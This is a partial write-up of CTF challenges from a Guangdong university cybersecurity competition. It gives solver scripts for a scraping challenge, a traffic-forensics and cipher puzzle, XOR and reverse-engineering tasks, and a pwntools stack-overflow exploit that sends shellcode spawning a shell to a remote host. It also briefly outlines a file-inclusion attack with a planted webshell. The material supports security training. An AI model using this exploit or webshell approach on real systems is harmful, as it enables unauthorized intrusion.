Sign-in challenge
Send the message "我来签到了" ("I'm here to sign in") directly to the official WeChat account.
easy_ctf
```python
import re

import requests

while True:
    session = requests.Session()
    ans = ""
    url = 'http://120.79.191.238:42958/'
    content = session.get(url).text
    # Pull the challenge string out of the table cell
    res = re.findall('<td style="WORD-WRAP: break-word" width="1600">(.*)<td>', content, re.S)
    # Strip CR/LF so line breaks are not counted as characters
    text = res[0].replace('\r', '').replace('\n', '')
    # Count how often each character occurs
    lst = {}
    for i in text:
        if i not in lst:
            lst[i] = 1
        else:
            lst[i] += 1

    # Sort by count (ascending) and join the characters in that order
    lst = sorted(lst.items(), key=lambda x: x[1])
    for i in lst:
        ans += i[0]

    # Submit in the same session the page was fetched with
    result = session.post(url, data={
        'ans': ans
    }).text

    if "flag" in result:
        print(result)
        print(ans)
        break
```
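Write the code according to what the challenge asks for and submit in a loop; the program stops once the response contains the flag.
in
File inclusion
Plant a webshell
Connect with AntSword
Composite (复合)
Open the file with Wireshark, inspect the traffic, then try exporting the HTTP objects.
text.html contains a flag, but after trying it, it is not the correct flag.
Going through the exported files, pass.md turns out to be a compressed archive that is missing its file header; restore the header and change the file extension.
Judging by its characteristics, the content of the file inside the archive is quoted-printable encoded.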
http://web.chacuo.net/charsetquotedprintable
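The decoded result looks like a passage of text, but the words are not real words, which suggests a Caesar-type cipher; try breaking it as a Vigenère cipher.
Extract the flag from the meaning of the passage: flag{life_is_fantastic }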
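The decoding steps above, done offline in Python instead of with online tools. This is an added example, not code from the original write-up. It assumes the archive is a ZIP whose 4-byte `PK\x03\x04` signature was stripped; the member name `pass.txt`, the key `ctf` and the sample data are constructed for illustration.

```python
import io
import quopri
import zipfile

ZIP_MAGIC = b"PK\x03\x04"  # ZIP local file header signature


def repair_zip(data: bytes) -> bytes:
    """Prepend the ZIP signature if it is missing (assumed form of the damage)."""
    return data if data.startswith(ZIP_MAGIC) else ZIP_MAGIC + data


def vigenere(text: str, key: str, sign: int) -> str:
    """Vigenere over ASCII letters; sign=+1 encrypts, sign=-1 decrypts."""
    out, k = [], 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[k % len(key)].lower()) - ord("a")
            out.append(chr((ord(ch) - base + sign * shift) % 26 + base))
            k += 1  # the key only advances on letters
        else:
            out.append(ch)
    return "".join(out)


def build_sample() -> bytes:
    """Constructed sample: Vigenere text, quoted-printable encoded, zipped, header stripped."""
    cipher = vigenere("life is fantastic", "ctf", +1)
    qp = "".join(f"={b:02X}" for b in cipher.encode())  # every byte as =XX
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("pass.txt", qp)  # hypothetical member name
    return buf.getvalue()[len(ZIP_MAGIC):]


def recover(damaged: bytes, member: str, key: str) -> str:
    """Repair the header, extract the member, decode quoted-printable, decrypt."""
    with zipfile.ZipFile(io.BytesIO(repair_zip(damaged))) as zf:
        qp = zf.read(member)
    return vigenere(quopri.decodestring(qp).decode(), key, -1)


if __name__ == "__main__":
    print(recover(build_sample(), "pass.txt", "ctf"))
```

In the real challenge the key is not known in advance, so the last step is a key search rather than a single decryption.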
jmp_rsp
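```python
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

# Shellcode that spawns /bin/sh, assembled for amd64
shellcode = asm(shellcraft.sh())

p = remote("47.106.122.102", 41377)

jmp_rsp = 0x46d01d  # use this to jmp rsp
# 136 bytes of padding reach the saved return address, which is overwritten
# with the jmp rsp gadget; after the return, rsp points at the shellcode.
# Padding must be bytes (not str) to concatenate with p64() on Python 3.
payload = b'0' * 136 + p64(jmp_rsp) + shellcode
p.sendline(payload)
pause()
p.interactive()
```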
crypto-xor2
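```python
def decode():
    # Read the ciphertext as text and XOR it with the repeating key
    with open("./cipher", "r") as f:
        ss = f.read()
    key = "xxxx"  # 4-character repeating key (shown as "xxxx" on the page)
    flag = ""
    for i, c in enumerate(ss):
        flag += chr(ord(c) ^ ord(key[i % 4]))
    print(flag)


decode()
```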
pyre
```python
def get_list():
    # Solver: for each target value, brute-force the ASCII character c
    # that satisfies c * 33 % 179 == value
    shuzus = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53,
              12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    shuzi = 179
    str = ""
    for shuzu in range(len(shuzus)):
        for i in range(0, 128):
            print(i)
            if i * 33 % shuzi != shuzus[shuzu]:
                continue
            else:
                str += chr(i)
                print(str)
                break


def test_flag():
    # The check recovered from the challenge: 42 characters, each compared
    # against the table after ord(c) * 33 % 179
    flag = input('请输入flag:')
    shuzus = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53,
              12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    if len(flag) != 42:
        print('长度有错')
        return 0
    shuzi = 179
    for i in range(len(flag)):
        if ord(flag[i]) * 33 % shuzi != shuzus[i]:
            print('未拿到')
            return
    print('拿到了flag')


test_flag()
get_list()
```
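Originally published on the WeChat official account bgbing安全: Partial write-up for the 2nd Guangdong University Student Cybersecurity Attack and Defense Competition (with a Psyduck giveaway)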